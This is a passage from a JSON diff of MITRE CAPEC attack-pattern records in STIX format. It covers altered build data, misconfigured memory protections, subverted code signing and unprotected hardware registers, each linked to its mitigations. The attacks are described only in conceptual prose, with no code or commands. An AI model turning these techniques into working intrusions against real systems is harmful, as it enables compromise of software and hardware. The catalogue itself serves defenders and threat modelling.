"course-of-action--d8534e9f-4499-45e3-9ae1-85cf37f54f1c", + "target_ref": "attack-pattern--ea2e5cbd-8278-4f8a-b56b-3cfb955d2366", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n During the system build process, the system is deliberately misconfigured by the alteration of the build data. 
Access to system configuration data files and build processes is susceptible to deliberate misconfiguration of the system.\n ", + "external_references": [ + { + "external_id": "CAPEC-678", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/678.html" + }, + { + "description": "Supply Chain Compromise: Compromise Software Supply Chain", + "external_id": "T1195.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/002" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + }, + { + "description": "Melinda Reed, John F. Miller, Paul Popick, Supply Chain Attack Patterns: Framework and Catalog, 2014--08, Office of the Assistant Secretary of Defense for Research and Engineering", + "external_id": "REF-660", + "source_name": "reference_from_CAPEC", + "url": "https://docplayer.net/13041016-Supply-chain-attack-patterns-framework-and-catalog.html" + } + ], + "id": "attack-pattern--d0a5a641-ba5e-4bd6-8a06-addfa4d03cfb", + "modified": "2023-01-24T00:00:00.000Z", + "name": "System Build Data Maliciously Altered", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Modify Data", + "Read Data" + ], + "Integrity": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_domains": [ + "Supply Chain", + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "\n ‘Make’ is a program used for building executable programs and libraries from source code by executing commands and 
following rules in a ‘makefile’. It can create a malicious executable if commands or dependency paths in the makefile are maliciously altered to execute an unwanted command or reference as a dependency maliciously altered code.\n " + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "An adversary has access to the data files and processes used for executing system configuration and performing the build." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implement configuration management security practices that protect the integrity of software and associated data.", + "id": "course-of-action--d984401e-2a31-4aab-af29-a41a5cbc9c1c", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-678-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--869d19dd-b471-4f89-b47b-0183ac8dc878", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d984401e-2a31-4aab-af29-a41a5cbc9c1c", + "target_ref": "attack-pattern--d0a5a641-ba5e-4bd6-8a06-addfa4d03cfb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Monitor and control access to the configuration management system.", + "id": "course-of-action--167812bc-7a9b-4800-ae3e-5bb696d54905", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-678-1", + "object_marking_refs": [ + 
"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8a21325b-976e-41b0-b832-ff513fd781d8", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--167812bc-7a9b-4800-ae3e-5bb696d54905", + "target_ref": "attack-pattern--d0a5a641-ba5e-4bd6-8a06-addfa4d03cfb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Harden centralized repositories against attack.", + "id": "course-of-action--d5f02498-2cb3-41af-9a58-79e54dfd1108", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-678-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cb0dbc9b-c7a5-4f9d-982c-b0f25445ecca", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d5f02498-2cb3-41af-9a58-79e54dfd1108", + "target_ref": "attack-pattern--d0a5a641-ba5e-4bd6-8a06-addfa4d03cfb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Establish acceptance criteria for configuration management check-in to assure integrity.", + "id": "course-of-action--177c82cf-28a6-4bec-ad88-7f539639ef51", + 
"modified": "2023-01-24T00:00:00.000Z", + "name": "coa-678-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--002a4543-59cc-405d-b6f7-835ee0f6b124", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--177c82cf-28a6-4bec-ad88-7f539639ef51", + "target_ref": "attack-pattern--d0a5a641-ba5e-4bd6-8a06-addfa4d03cfb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Plan for and audit the security of configuration management administration processes.", + "id": "course-of-action--8933af3c-bb36-4306-b04a-c9d575f6ceae", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-678-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0868754c-7cfa-484b-914c-804bad2eccd0", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8933af3c-bb36-4306-b04a-c9d575f6ceae", + "target_ref": "attack-pattern--d0a5a641-ba5e-4bd6-8a06-addfa4d03cfb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Maintain configuration control over 
operational systems.", + "id": "course-of-action--71fca30c-ceb8-451f-9299-3c9b1b83d9ae", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-678-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--950b2aca-4816-440a-b10e-52af4e8d7a6b", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--71fca30c-ceb8-451f-9299-3c9b1b83d9ae", + "target_ref": "attack-pattern--d0a5a641-ba5e-4bd6-8a06-addfa4d03cfb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary takes advantage of missing or incorrectly configured access control within memory to read/write data or inject malicious code into said memory.\n ", + "external_references": [ + { + "external_id": "CAPEC-679", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/679.html" + }, + { + "external_id": "CWE-1222", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1222.html" + }, + { + "external_id": "CWE-1252", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1252.html" + }, + { + "external_id": "CWE-1257", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1257.html" + }, + { + "external_id": "CWE-1260", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1260.html" + }, + { + "external_id": "CWE-1274", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1274.html" + }, + { + "external_id": "CWE-1282", + "source_name": "cwe", + "url": 
"http://cwe.mitre.org/data/definitions/1282.html" + }, + { + "external_id": "CWE-1312", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1312.html" + }, + { + "external_id": "CWE-1316", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1316.html" + }, + { + "external_id": "CWE-1326", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1326.html" + }, + { + "description": "Cortex-R4 Manual, ARM", + "external_id": "REF-687", + "source_name": "reference_from_CAPEC", + "url": "https://developer.arm.com/ip-products/processors/cortex-m/cortex-m4" + }, + { + "description": "Testing for NoSQL Injection, The OWASP Foundation", + "external_id": "REF-668", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.6-Testing_for_NoSQL_Injection" + }, + { + "description": "Memory Protection Unit (MPU), ARM", + "external_id": "REF-689", + "source_name": "reference_from_CAPEC", + "url": "https://static.docs.arm.com/100699/0100/armv8m_architecture_memory_protection_unit_100699_0100_00_en.pdf" + }, + { + "description": "Christopher Domas, The Memory Sinkhole, 2015--07---20", + "external_id": "REF-690", + "source_name": "reference_from_CAPEC", + "url": "https://github.com/xoreaxeaxeax/sinkhole/blob/master/us-15-Domas-TheMemorySinkhole-wp.pdf" + }, + { + "description": "Address Range Memory Mirroring, 2016--07---13, Taku Izumi, Fujitsu Limited", + "external_id": "REF-691", + "source_name": "reference_from_CAPEC", + "url": "https://www.fujitsu.com/jp/documents/products/software/os/linux/catalog/LinuxConJapan2016-Izumi.pdf" + }, + { + "description": "Yuriy Bulygin, Oleksandr Bazhaniuk, Andrew Furtak, John Loucaides, Mikhail Gorobets, BARing the System – New vulnerabilities in Coreboot & UEFI-based Systems, 2017", + "external_id": "REF-692", + "source_name": "reference_from_CAPEC", + "url": 
"https://www.c7zero.info/stuff/REConBrussels2017_BARing_the_system.pdf" + } + ], + "id": "attack-pattern--3ba20dcc-8fec-4d74-a472-eb9694fe8142", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Exploitation of Improperly Configured or Implemented Memory Protections", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--92cdcd3d-d734-4442-afc3-4599f261498b", + "attack-pattern--aac17300-6cdd-4f50-82c3-da5a01d225ac" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Read Data", + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Hardware", + "Hardware" + ], + "x_capec_example_instances": [ + "\n A hardware product contains non-volatile memory, which itself contains boot code that is insufficiently protected. An adversary then modifies this memory to either bypass the secure boot process or to execute their own code.\n ", + "\n A hardware product leverages a CPU that does not possess a memory-protection unit (MPU) and a memory-management unit (MMU) nor a special bit to support write exclusivity, resulting in no write exclusivity. Because of this, an adversary is able to inject malicious code into the memory and later execute it to achieve the desired outcome.\n " + ], + "x_capec_extended_description": "\n Hardware product designs often need to implement memory protection features to prevent users from reading and modifying memory reserved for security operations such as secure booting, authenticating code, device attestation, and more. 
However, these protection features may be missing if not configured by developers. For example, this can occur if the developers assume these features are configured elsewhere. Additionally, developers often attempt to impose proper protection features, but may incorrectly configure these controls. One such example would be setting controls with insufficient granularity for protected address regions. If an adversary is able to discover improper access controls surrounding memory, it could result in the adversary obtaining sensitive data, executing code, circumventing security mechanisms, escalating privileges, or even denying service to higher privilege software.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Access to the hardware being leveraged." + ], + "x_capec_skills_required": { + "High": "Intricate knowledge of memory structures.", + "Medium": "Ability to craft malicious code to inject into the memory region." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that protected and unprotected memory ranges are isolated and do not overlap.", + "id": "course-of-action--d8644789-b5aa-430b-ba1a-8debdc9b27e0", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-679-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--93b182a2-5d09-46dc-a864-f76e8794dbc0", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": 
"course-of-action--d8644789-b5aa-430b-ba1a-8debdc9b27e0", + "target_ref": "attack-pattern--3ba20dcc-8fec-4d74-a472-eb9694fe8142", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "If memory regions must overlap, leverage memory priority schemes if memory regions can overlap.", + "id": "course-of-action--e00eb22c-824b-42c4-bbeb-869936a1019e", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-679-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3c6a1cf7-f17e-41e5-a34a-c559ed3bab78", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e00eb22c-824b-42c4-bbeb-869936a1019e", + "target_ref": "attack-pattern--3ba20dcc-8fec-4d74-a472-eb9694fe8142", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that original and mirrored memory regions apply the same protections.", + "id": "course-of-action--a95b7f45-adeb-4411-b4f1-92dec47a8028", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-679-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--40599fe1-c651-4840-8670-ea221031fd9b", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": 
[ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a95b7f45-adeb-4411-b4f1-92dec47a8028", + "target_ref": "attack-pattern--3ba20dcc-8fec-4d74-a472-eb9694fe8142", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure immutable code or data is programmed into ROM or write-once memory.", + "id": "course-of-action--861bcbd5-8263-435d-83cd-98b7a1297980", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-679-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b1b7b572-66d6-497f-9534-70a94507d789", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--861bcbd5-8263-435d-83cd-98b7a1297980", + "target_ref": "attack-pattern--3ba20dcc-8fec-4d74-a472-eb9694fe8142", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Many languages use code signing facilities to vouch for code's identity and to thus tie code to its assigned privileges within an environment. Subverting this mechanism can be instrumental in an attacker escalating privilege. 
Any means of subverting the way that a virtual machine enforces code signing classifies for this style of attack.", + "external_references": [ + { + "external_id": "CAPEC-68", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/68.html" + }, + { + "external_id": "CWE-325", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/325.html" + }, + { + "external_id": "CWE-328", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/328.html" + }, + { + "external_id": "CWE-1326", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1326.html" + }, + { + "description": "Subvert Trust Controls: Code Signing", + "external_id": "T1553.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1553/002" + } + ], + "id": "attack-pattern--2b8d7aaf-bd4b-424f-8df4-6d0f37b72f4b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Subvert Code-signing Facilities", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--80649f3c-d2f3-4703-9e78-e096673a7517" + ], + "x_capec_child_of_refs": [ + "attack-pattern--c05fff04-b965-4a11-9c18-379dac31969f" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "In old versions (prior to 3.0b4) of the Netscape web browser Attackers able to foist a malicious Applet into a client's browser could execute the \"Magic Coat\" attack. In this attack, the offending Applet would implement its own getSigners() method. 
This implementation would use the containing VM's APIs to acquire other Applet's signatures (by calling _their_ getSigners() method) and if any running Applet had privileged-enough signature, the malicious Applet would have inherited that privilege just be (metaphorically) donning the others' coats.", + "Some (older) web browsers allowed scripting languages, such as JavaScript, to call signed Java code. In these circumstances, the browser's VM implementation would choose not to conduct stack inspection across language boundaries (from called signed Java to calling JavaScript) and would short-circuit \"true\" at the language boundary. Doing so meant that the VM would allow any (unprivileged) script to call privileged functions within signed code with impunity, causing them to fall prey to luring attacks.", + "The ability to load unsigned code into the kernel of earlier versions of Vista and bypass integrity checking is an example of such subversion. In the proof-of-concept, it is possible to bypass the signature-checking mechanism Vista uses to load device drivers." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "A framework-based language that supports code signing (such as, and most commonly, Java or .NET)", + "Deployed code that has been signed by its authoring vendor, or a partner.", + "The attacker will, for most circumstances, also need to be able to place code in the victim container. This does not necessarily mean that they will have to subvert host-level security, except when explicitly indicated." + ], + "x_capec_resources_required": [ + "The Attacker needs no special resources beyond the listed prerequisites in order to conduct this style of attack." + ], + "x_capec_skills_required": { + "High": "Subverting code signing is not a trivial activity. Most code signing and verification schemes are based on use of cryptography and the attacker needs to have an understanding of these cryptographic operations in good detail. 
Additionally the attacker also needs to be aware of the way memory is assigned and accessed by the container since, often, the only way to subvert code signing would be to patch the code in memory. Finally, a knowledge of the platform specific mechanisms of signing and verifying code is a must." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "A given code signing scheme may be fallible due to improper use of cryptography. Developers must never roll out their own cryptography, nor should existing primitives be modified or ignored.", + "id": "course-of-action--4f33facb-34c1-4eab-9b1f-e31ba84713d2", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-68-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1e2f360c-c268-4b41-a5b7-b73b41b6ad49", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4f33facb-34c1-4eab-9b1f-e31ba84713d2", + "target_ref": "attack-pattern--2b8d7aaf-bd4b-424f-8df4-6d0f37b72f4b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "If an attacker cannot attack the scheme directly, they might try to alter the environment that affects the signing and verification processes. 
A possible mitigation is to avoid reliance on flags or environment variables that are user-controllable.", + "id": "course-of-action--211fb4c0-38c1-4bfe-bb8e-b32e9baaf81c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-68-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--08999418-b2b2-438c-aa9b-95bf0933923b", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--211fb4c0-38c1-4bfe-bb8e-b32e9baaf81c", + "target_ref": "attack-pattern--2b8d7aaf-bd4b-424f-8df4-6d0f37b72f4b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary exploits missing or incorrectly configured access control within registers to read/write data that is not meant to be obtained or modified by a user.\n ", + "external_references": [ + { + "external_id": "CAPEC-680", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/680.html" + }, + { + "external_id": "CWE-1224", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1224.html" + }, + { + "external_id": "CWE-1231", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1231.html" + }, + { + "external_id": "CWE-1233", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1233.html" + }, + { + "external_id": "CWE-1262", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1262.html" + }, + { + "external_id": "CWE-1283", + "source_name": "cwe", + "url": 
"http://cwe.mitre.org/data/definitions/1283.html" + }, + { + "description": "Brandon Hill, Huge Intel CPU Bug Allegedly Causes Kernel Memory Vulnerability With Up To 30% Performance Hit In Windows And Linux, 2018--01---02, David Altavilla and Hot Hardware, Inc", + "external_id": "REF-693", + "source_name": "reference_from_CAPEC", + "url": "https://hothardware.com/news/intel-cpu-bug-kernel-memory-isolation-linux-windows-macos" + } + ], + "id": "attack-pattern--1abd165a-57e9-4b78-9221-7b6fcdc57810", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Exploitation of Improperly Controlled Registers", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--92cdcd3d-d734-4442-afc3-4599f261498b", + "attack-pattern--aac17300-6cdd-4f50-82c3-da5a01d225ac" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Hardware", + "Hardware" + ], + "x_capec_example_instances": [ + "\n During a System-on-Chip's (SoC) secure boot process, the code to be authenticated is measured to determine the code's validity. This entails the one-way hash of the code binary being calculated and extended to the previous hash. The value obtained after completion of the boot flow is then stored in a register with the intent of later verifying this value to determine if the boot flow has been tampered with. However, the register being used does not prevent an adversary from modifying the register's contents, which can result in the adversary spoofing the measurement data used in the attestation process.\n " + ], + "x_capec_extended_description": "\n Hardware systems often utilize trusted lock bits to prevent a set of registers from being written to or to restrict a register to only being written to once. 
Registers are also frequently used to store sensitive data leveraged in additional security operations, such as secure booting, authenticating code, device attestation, and more. However, the access control mechanisms meant to protect these registers may be fully missing or ineffective due to misconfiguration. If an adversary is able to discover improper access controls surrounding registers, it could result in the adversary obtaining sensitive data and/or modifying data that is meant to be immutable. This can ultimately result in processes like secure boot being circumvented or in protected configurations being modified.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Awareness of the hardware being leveraged.", + "Access to the hardware being leveraged." + ], + "x_capec_skills_required": { + "High": "Intricate knowledge of registers." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design proper access control policies for hardware register access from software and ensure these policies are implemented in accordance with the specified design.", + "id": "course-of-action--963ffcae-bcd8-4754-a147-b844f6e13273", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-680-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--32aef2ed-6339-425f-9acf-8117ffb0c421", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--963ffcae-bcd8-4754-a147-b844f6e13273", + 
"target_ref": "attack-pattern--1abd165a-57e9-4b78-9221-7b6fcdc57810", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure security lock bit protections are reviewed for design inconsistencies and common weaknesses.", + "id": "course-of-action--6b798e4e-c828-4581-abb6-6e17c7dd80c8", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-680-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3e7a22ee-e503-4bb5-842d-dccfa1314700", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": 